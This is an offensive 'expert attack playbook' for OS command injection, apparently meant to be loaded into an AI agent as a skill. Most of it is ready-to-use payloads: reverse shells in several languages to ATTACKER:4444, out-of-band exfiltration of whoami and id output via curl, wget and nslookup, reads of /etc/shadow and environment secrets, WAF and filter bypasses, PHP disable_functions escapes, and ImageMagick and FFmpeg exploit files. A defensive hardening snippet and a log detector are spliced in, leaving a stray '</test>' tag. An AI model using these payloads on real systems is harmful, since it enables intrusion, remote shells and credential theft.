cmdi-command-injection


SKILL: OS Command Injection — Expert Attack Playbook


AI LOAD INSTRUCTION: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors.

0. RELATED ROUTING


Before going deeper, you can first load:
  • upload insecure files: when the shell sink is part of a broader upload, import, or conversion workflow

First-pass payload families


| Context | Start with | Backup |
|---|---|---|
| generic shell separator | `;id` | `&&id` |
| quoted argument | `";id;"` | `';id;'` |
| blind timing | `;sleep 5` | `& timeout /T 5 /NOBREAK` |
| command substitution | `$(id)` | `` `id` `` |
| out-of-band DNS | `;nslookup token.collab` | Windows `nslookup` variant |

```text
cat$IFS/etc/passwd
{cat,/etc/passwd}
%0aid
```


1. SHELL METACHARACTERS (INJECTION OPERATORS)


These characters break out of the command context and inject new commands:

| Metacharacter | Behavior | Example |
|---|---|---|
| `;` | Runs second command regardless | `dir; whoami` |
| `\|` | Pipes stdout to second command | `dir \| whoami` |
| `\|\|` | Run second only if first FAILS | `dir \|\| whoami` |
| `&` | Run second in background (or sequenced in Windows) | `dir & whoami` |
| `&&` | Run second only if first SUCCEEDS | `dir && whoami` |
| `$(cmd)` | Command substitution | `echo $(whoami)` |
| `` `cmd` `` | Command substitution (backtick) | ``echo `whoami` `` |
| `>` | Redirect stdout to file | `cmd > /tmp/out` |
| `>>` | Append to file | `cmd >> /tmp/out` |
| `<` | Read file as stdin | `cmd < /etc/passwd` |
| `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` |
| `%0d%0a` | CRLF (URL-encoded) | Multi-command injection |


2. COMMON VULNERABLE CODE PATTERNS


PHP


```php
$dir = $_GET['dir'];
$out = shell_exec("du -h /var/www/html/" . $dir);
// Inject: dir=../ ; cat /etc/passwd
// Inject: dir=../ $(cat /etc/passwd)

// $ip, $file and $host likewise arrive straight from the request
exec("ping -c 1 " . $ip);          // $ip = "127.0.0.1 && cat /etc/passwd"
system("convert " . $file);        // ImageMagick RCE
passthru("nslookup " . $host);     // $host = "x.com; id"
```

Python


```python
import os
import subprocess

# url, path and host arrive straight from the request
os.system("curl " + url)            # url = "x.com; id"
subprocess.call("ls " + path, shell=True)  # shell=True is the key vulnerability
os.popen("ping " + host)
```

Node.js


```javascript
const { exec } = require('child_process');
// host comes straight from the query string; callback elided
exec('ping ' + req.query.host, ...);  // host = "x.com; id"
```

Perl


```perl
use CGI qw(param);

$dir = param("dir");
$command = "du -h /var/www/html" . $dir;
system($command);
# Inject dir field: | cat /etc/passwd
```

ASP (Classic)


```vb
szCMD = "type C:\logs\" & Request.Form("FileName")
Set oShell = Server.CreateObject("WScript.Shell")
oShell.Run szCMD
' Inject FileName: foo.txt & whoami > C:\inetpub\wwwroot\out.txt
```
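The hardened counterpart to the concatenation sinks above, as an added example that is not code from the original page: the same "ping a host" feature written with allow-list validation and an argv list, so no shell ever parses the user value. The function names (`validate_host`, `build_ping_argv`, `ping_host`, `shell_quote_for_legacy`) are assumptions for this example.

```python
"""Hardened "ping a host" sink (added example; names are assumptions)."""
import ipaddress
import re
import shlex
import subprocess

# Hostnames: dotted RFC 1123 labels only, no leading/trailing hyphen,
# nothing a shell could interpret.
_HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def validate_host(value: str) -> str:
    """Allow-list check: return the value if it is an IP address or a plain
    hostname, otherwise raise ValueError. Rejecting everything else is
    stronger than trying to strip individual metacharacters."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if _HOSTNAME_RE.fullmatch(value):
        return value
    raise ValueError(f"not a host or IP address: {value!r}")


def build_ping_argv(host: str) -> list[str]:
    """argv list for subprocess: every element is exactly one argument, so
    ';', '&&', '|', '$()' and backticks can never split the command."""
    return ["ping", "-c", "1", validate_host(host)]


def ping_host(host: str, timeout: float = 5.0) -> str:
    """Run ping with no shell involved (shell=False is the default; the argv
    list is what keeps the input inert)."""
    result = subprocess.run(build_ping_argv(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


def shell_quote_for_legacy(host: str) -> str:
    """If a shell is unavoidable (e.g. a legacy wrapper script), shlex.quote
    turns the value into a single shell word. 'x.com; id' then reaches ping
    as one bogus hostname instead of two commands. Validation first is still
    the preferred fix; this only contains the damage."""
    return "ping -c 1 " + shlex.quote(host)


def rejects(value: str) -> bool:
    """True if validate_host refuses the value."""
    try:
        validate_host(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "example.com", "x.com; id", "$(id)", "x.com\nid"]:
        print(f"{candidate!r:22} rejected={rejects(candidate)}")
</test>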

3. BLIND COMMAND INJECTION — DETECTION


When response shows no command output:

Time-Based Detection


```bash
# Linux:
; sleep 5
| sleep 5
$(sleep 5)
`sleep 5`
& sleep 5 &

# Windows:
& timeout /T 5 /NOBREAK
& ping -n 5 127.0.0.1
& waitfor /T 5 signal777
```

Compare response time without payload vs with payload. 5+ second delay = confirmed.

OOB via DNS


```bash
# Linux:
; nslookup BURP_COLLAB_HOST
; host `whoami`.BURP_COLLAB_HOST
$(nslookup $(whoami).BURP_COLLAB_HOST)

# Windows:
& nslookup BURP_COLLAB_HOST
& nslookup %USERNAME%.BURP_COLLAB_HOST
```

OOB via HTTP


```bash
# Linux:
; curl http://BURP_COLLAB_HOST/`whoami`
; wget http://BURP_COLLAB_HOST/$(id|base64)

# Windows:
& powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/$(whoami)"
```

OOB via File Write (web root)

```bash
; id > /var/www/html/RANDOM_FILE.txt
```

---


4. INJECTION CONTEXT VARIATIONS


Within Quoted String


```bash
command "INJECT"
```

Inject: `" ; id ; "`

Result: `command "" ; id ; ""`

Within Single-Quoted String


```bash
command 'INJECT'
```

Inject: `'; id;'`

Result: `command ''; id;''`

Within Backtick Execution


```bash
output=`command INJECT`
```

Inject: `` x` ; id ; ` ``

File Path Context


```bash
cat /var/log/INJECT
```

Inject: `../../../etc/passwd` (path traversal)

Inject: `access.log; id` (command injection)


---


5. PAYLOAD LIBRARY


Information Gathering


```bash
; id                          # current user
; whoami                      # user name
; uname -a                    # OS info
; cat /etc/passwd             # user list
; cat /etc/shadow             # password hashes (if root)
; ls /home/                   # home directories
; env                         # environment variables (DB creds, API keys!)
; printenv                    # same
; cat /proc/1/environ         # process environment
; ifconfig                    # network interfaces
; cat /etc/hosts              # host entries
```

Reverse Shells (Linux)


```bash
# Bash:
; bash -i >& /dev/tcp/ATTACKER/4444 0>&1
; bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

# Python:
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Netcat (with -e):
; nc ATTACKER 4444 -e /bin/bash

# Netcat (without -e / OpenBSD):
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 4444 >/tmp/f

# Perl:
; perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

Reverse Shells (Windows via PowerShell)


```powershell
& powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

& powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

6. FILTER BYPASS TECHNIQUES


Space Alternatives (when space is filtered)


```bash
cat</etc/passwd          # < instead of space
{cat,/etc/passwd}        # brace expansion
cat$IFS/etc/passwd       # $IFS variable (field separator)
X=$'\x20'&&cat${X}/etc/passwd  # hex encoded space
```

Slash Alternatives (when `/` is filtered)

```bash
$'\057'etc$'\057'passwd  # octal representation
cat /???/???sec???        # glob expansion
```

Keyword Bypass via Variable Assembly


```bash
a=c;b=at;c=/etc/passwd; $a$b $c   # 'cat /etc/passwd'
c=at;ca$c /etc/passwd              # cat
```

Newline Injection


```bash
cmd%0Aid%0Awhoami          # URL-encoded newlines
cmd$'\n'id$'\n'whoami      # literal newlines
```

7. COMMON INJECTION ENTRY POINTS


| Entry | Example |
|---|---|
| Network tools | ping, nslookup, traceroute, whois forms |
| File conversion | image resize, PDF generate, format convert |
| Email senders | From address, name fields in notification emails |
| Search/sort parameters | Passed to grep, find, sort commands |
| Log viewing | Passed to tail, grep commands |
| Custom script execution | "Run test" features, CI/CD hooks |
| DNS lookup features | rDNS lookup, WHOIS query |
| Backup/restore features | File path parameters |
| Archive processing | zip/unzip, tar with user-provided filename |

8. BLIND INJECTION DECISION TREE


```text
Found potential injection point?
├── Try basic: ; sleep 5
│   └── Response delays? → Confirmed blind injection
│       ├── Extract data via timing: if/then sleep
│       └── Use OOB: curl/nslookup to Collaborator
├── No delay observed?
│   ├── Try: | sleep 5
│   ├── Try: $(sleep 5)
│   ├── Try: ` sleep 5 `
│   ├── Try after URL encoding: %3B%20sleep%205
│   └── Try double encoding: %253B%2520sleep%25205
└── All blocked → check WEB APPLICATION LAYER
    Filter on input? → encode differently
    Filter on specific commands? → whitespace bypass, $IFS, glob
```

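The same payload families this playbook walks through (metacharacters in section 1, timing and OOB probes in section 3, the `$IFS`/brace-expansion bypasses in section 6, and the single and double URL encoding in the decision tree above) are what a defender looks for in access logs. The following is an added example, not code from the original page: a detector that peels percent-encoding layer by layer, so encoding depth is itself an indicator, and runs one regex per family over the decoded parameter value. The log format, parameter names and sample lines are constructed for the demo.

```python
"""Log-side detection for command-injection payload families (added example;
log format, parameter names and sample lines are constructed)."""
import re
from urllib.parse import unquote, urlsplit

# One regex per payload family, applied to the fully decoded parameter value.
PATTERNS = {
    "separator": re.compile(r"[;&|\r\n]"),
    "substitution": re.compile(r"\$\(|`"),
    "timing": re.compile(r"\bsleep\s+\d|\btimeout\s+/T\s+\d|\bping\s+-n\s+\d|\bwaitfor\b", re.I),
    "oob": re.compile(r"\b(nslookup|curl|wget|dig|Invoke-WebRequest)\b", re.I),
    "whitespace_bypass": re.compile(r"\$\{?IFS\}?|\{[^{}\s]*,[^{}\s]*\}|\$'\\x20'"),
}

# Combined-log style line: 10.0.0.5 - - [ts] "GET /path?q=1 HTTP/1.1" 200 512
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode_layers(raw: str, max_rounds: int = 5) -> tuple[str, int]:
    """Percent-decode until the value stops changing. Returns the decoded
    value and the number of layers peeled; 2+ means double encoding, which
    legitimate clients almost never send."""
    value, rounds = raw, 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def analyze_value(raw: str) -> set[str]:
    """Indicator names that fire for one raw (still encoded) parameter value."""
    decoded, rounds = decode_layers(raw)
    hits = {name for name, pat in PATTERNS.items() if pat.search(decoded)}
    if rounds >= 2:
        hits.add("multi_encoding")
    return hits


def scan_log(text: str) -> list[dict]:
    """Walk access-log lines, split each query string without decoding it
    (so encoding depth survives) and report every parameter that trips at
    least one indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            hits = analyze_value(raw)
            if hits:
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "param": name,
                    "value": decode_layers(raw)[0],
                    "indicators": sorted(hits),
                })
    return findings


# Constructed sample: one benign request followed by five payload families.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /ping?host=example.com HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /ping?host=example.com%3B%20sleep%205 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "GET /ping?host=127.0.0.1%26%26cat%24IFS%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.5 - - [12/Mar/2024:10:00:04 +0000] "GET /ping?host=%253B%2520nslookup%2520token.collab HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:00:05 +0000] "GET /lookup?q=%7Bcat%2C%2Fetc%2Fpasswd%7D HTTP/1.1" 200 300
10.0.0.5 - - [12/Mar/2024:10:00:06 +0000] "GET /ping?host=x.com%0aid HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {', '.join(f['indicators'])}")
```

The query string is split by hand rather than with `parse_qsl` because that helper already decodes one layer, which would hide the difference between `%3B` and `%253B`. The patterns are deliberately broad (a `|` inside a legitimate value will fire `separator`); tune them against the application's real parameter vocabulary before alerting on them.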

9. ADVANCED WAF BYPASS TECHNIQUES


Wildcard Expansion


Use `?` and `*` to bypass keyword filters:

```bash
/???/??t /???/p??s??        # /bin/cat /etc/passwd
/???/???/????2 *.php        # /usr/bin/find2 *.php (approximate)
```

Globbing for specific files:

```bash
cat /e?c/p?sswd
cat /e*c/p*d
```

cat Alternatives (when "cat" is filtered)


```bash
tac /etc/passwd          # reverse cat
nl /etc/passwd           # numbered lines
head /etc/passwd
tail /etc/passwd
more /etc/passwd
less /etc/passwd
sort /etc/passwd
uniq /etc/passwd
rev /etc/passwd | rev
xxd /etc/passwd
strings /etc/passwd
od -c /etc/passwd
base64 /etc/passwd       # then decode offline
```

Comment Insertion (PHP specific)


Insert comments within function names to bypass WAF:

```php
sys/*x*/tem('id')   // PHP ignores /* */ in some eval contexts
```

Note: this works with eval() and similar PHP dynamic calls

XOR String Construction (PHP)


Build function names from XOR of printable characters (bytes shown URL-encoded, each XORed with a backtick, 0x60):

```php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
```

Produces: "assert"

```php
$_('%13%19%13%14%05%0d'|'%60%60%60%60%60%60');
```

Evaluates: assert("system")

Base64/ROT13 Encoding


Encode payload, decode at runtime:

```php
base64_decode('c3lzdGVt')('id');   // system('id')
str_rot13('flfgrz')('id');         // "system" → "flfgrz" via ROT13
```

chr() Assembly


Build strings character by character:

```php
chr(115).chr(121).chr(115).chr(116).chr(101).chr(109)   // "system"
```

Dollar-Sign Variable Tricks


`$IFS` (Internal Field Separator) as space, and unset variables expanding to empty:

```bash
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
c${x}at /etc/passwd      # $x is unset → "cat"
```

---

10. PHP disable_functions BYPASS PATHS


When `system()`, `exec()`, `shell_exec()`, `passthru()`, `popen()`, `proc_open()` are all disabled:

Path 1: LD_PRELOAD + mail()/putenv()


```php
// 1. Upload shared object (.so) that hooks a libc function
// 2. Set LD_PRELOAD to point to it
putenv("LD_PRELOAD=/tmp/evil.so");
// 3. Trigger external process (mail() calls sendmail)
mail("a@b.com", "", "");
// The .so's constructor runs with shell access
```

Path 2: Shellshock (CVE-2014-6271)


```php
// If bash is vulnerable to Shellshock:
putenv("PHP_LOL=() { :; }; /usr/bin/id > /tmp/out");
mail("a@b.com", "", "");
// Bash processes the function definition and runs the trailing command
```

Path 3: Apache mod_cgi + .htaccess


```php
// Write .htaccess enabling CGI (double quotes so \n is a real newline):
file_put_contents('/var/www/html/.htaccess', "Options +ExecCGI\nAddHandler cgi-script .sh");
// Write CGI script:
file_put_contents('/var/www/html/cmd.sh', "#!/bin/bash\necho Content-type: text/html\necho\n$1");
chmod('/var/www/html/cmd.sh', 0755);
// Access: /cmd.sh?id
```

Path 4: PHP-FPM / FastCGI


```php
// If PHP-FPM socket is accessible (/var/run/php-fpm.sock or port 9000):
// Send crafted FastCGI request to execute arbitrary PHP with different php.ini
// Tool: https://github.com/neex/phuip-fpizdam
// Override: PHP_VALUE=auto_prepend_file=/tmp/shell.php
```

Path 5: COM Object (Windows)


```php
// Windows only, if COM extension enabled:
$wsh = new COM('WScript.Shell');
$exec = $wsh->Run('cmd /c whoami > C:\inetpub\wwwroot\out.txt', 0, true);
```

Path 6: ImageMagick Delegate (CVE-2016-3714 "ImageTragick")


If ImageMagick processes user-uploaded images, upload an SVG/MVG with an embedded command. Content of exploit.svg:

```text
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|id > /tmp/pwned")'
pop graphic-context
```

Also consider (summary): iconv (CVE-2024-2961) via `php://filter/convert.iconv`; FFI (`FFI::cdef` + libc) when the extension is enabled.

11. COMPONENT-LEVEL COMMAND INJECTION


ImageMagick Delegate Abuse


MVG format with shell command in URL:

```text
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id > /tmp/out`'
pop graphic-context
```

Or via filename: `convert '|id' out.png`

FFmpeg (HLS/concat protocol)


SSRF/LFI via m3u8 playlist:

```text
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://attacker.com/header.txt|file:///etc/passwd
#EXT-X-ENDLIST
```

Upload as .m3u8; FFmpeg processes it and may leak file contents in the output.

Elasticsearch Groovy Script (pre-5.x)


```http
POST /_search
{
  "query": { "match_all": {} },
  "script_fields": {
    "cmd": {
      "script": "Runtime rt = Runtime.getRuntime(); rt.exec('id')"
    }
  }
}
```

Ping/Traceroute/NSLookup Diagnostic Pages


Classic injection point in network diagnostic features:

```text
Input: 127.0.0.1; id
Input: 127.0.0.1 && cat /etc/passwd
Input: `id`.attacker.com        (DNS exfil via backtick)
```

These features directly call OS commands with user input.


**Other sinks (quick reference):** PDF generators (wkhtmltopdf / WeasyPrint with user HTML); Git wrappers (`git clone` URL / hooks).
